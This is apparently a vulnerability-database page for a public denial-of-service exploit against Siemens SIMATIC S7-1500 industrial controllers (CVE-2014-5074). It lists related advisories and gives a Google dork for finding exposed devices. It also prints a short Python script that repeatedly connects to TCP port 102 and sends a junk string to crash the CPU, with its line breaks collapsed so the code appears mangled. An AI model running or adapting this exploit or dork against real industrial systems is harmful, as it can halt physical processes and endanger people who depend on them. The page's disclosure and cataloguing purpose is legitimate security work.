Siemens SIMATIC S7-1500 CPU - Remote Denial of Service

🗓️ 22 May 2018 00:00:00Reported by t4rkd3vilzType

Siemens S7-1500 CPU Remote Denial of Service from TCP port 10

Reporter	Title	Published	Views	Family All 10
0day.today	Siemens SIMATIC S7-1500 CPU - Remote Denial of Service Exploit	23 May 201800:00	–	zdt
Tenable Nessus	Siemens SIMATIC S7 1500 Firmware < 1.6.0 DoS Vulnerability	21 May 201900:00	–	nessus
Tenable Nessus	Siemens Simatic Unspecified Vulnerability	8 Nov 201900:00	–	nessus
Tenable Nessus	Siemens SIMATIC S7-1500 Denial of Service (CVE-2014-5074)	7 Feb 202200:00	–	nessus
CVE	CVE-2014-5074	17 Aug 201423:00	–	cve
Cvelist	CVE-2014-5074	17 Aug 201423:00	–	cvelist
exploitpack	Siemens SIMATIC S7-1500 CPU - Remote Denial of Service	22 May 201800:00	–	exploitpack
ICS	Siemens SIMATIC S7-1500 CPU Denial of Service	17 May 201406:00	–	ics
NVD	CVE-2014-5074	17 Aug 201423:55	–	nvd
Prion	Code injection	17 Aug 201423:55	–	prion

# Exploit Title: Siemens SIMATIC S7-1500 CPU - Remote Denial of Service
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-22
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1500 CPU all versions before V1.6
# Tested on: Kali Linux
# CVE: CVE-2014-5074


#!/usr/bin/python

import socket import sys from time import sleep if
len(sys.argv) != 2: print "Usage: exploit.py <ip>" sys.exit(0) for x in
range(1,50): s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#vulnerable TCP port 102 connect=s.connect((str(sys.argv[1]), 102))
s.send('some evil string \r\n\n') print "bufff " + str(x) + " sent...\n"
result=s.recv(1024) print result s.close() sleep(7)

22 May 2018 00:00Current

6.5Medium risk

Vulners AI Score6.5

CVSS 27.1

EPSS0.12884